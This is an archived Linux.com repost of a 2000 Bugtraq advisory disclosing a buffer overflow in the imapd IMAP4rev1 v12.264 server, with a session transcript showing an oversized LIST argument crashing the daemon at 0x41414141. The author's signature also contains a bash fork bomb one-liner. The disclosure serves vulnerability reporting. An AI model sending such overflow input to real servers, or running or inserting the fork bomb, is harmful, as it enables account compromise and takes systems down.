Linux.com Article DB: imapd4r1 v12.264 exploit

From: Michal Zalewski Subject: imapd4r1 v12.264 To: BUGTRAQ@SECURITYFOCUS.COM

Newest RH:

* OK nimue IMAP4rev1 v12.264 server ready 1 login lcamtuf test 1 OK LOGIN completed 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]=20 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()

*sigh*

Privledges seems to be dropped, but, anyway, it's nice way to get shell access to mail account, maybe grab some data from memory etc. I believe both imap and ipopd packages need code security audit.

_______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=3D--=3D> bash$ :(){ :|:&};: =3D-----=3D> God is real, unless declared integer. <=3D-----=3D

Originally published on Linux.com. Released under the Open Content License unless otherwise stated. Notify Gareth Watts of any errors or copyright violations.

Originally Published: Monday, 17 April 2000	Author: Alexander Reelsen
Published to: news_enhance_security/Security News	Page: 1/1 - [Std View]
imapd4r1 v12.264 exploit The imap daemon shipped with the newest redhat has a security hole, which allows the intruder to get shell access to the mail account.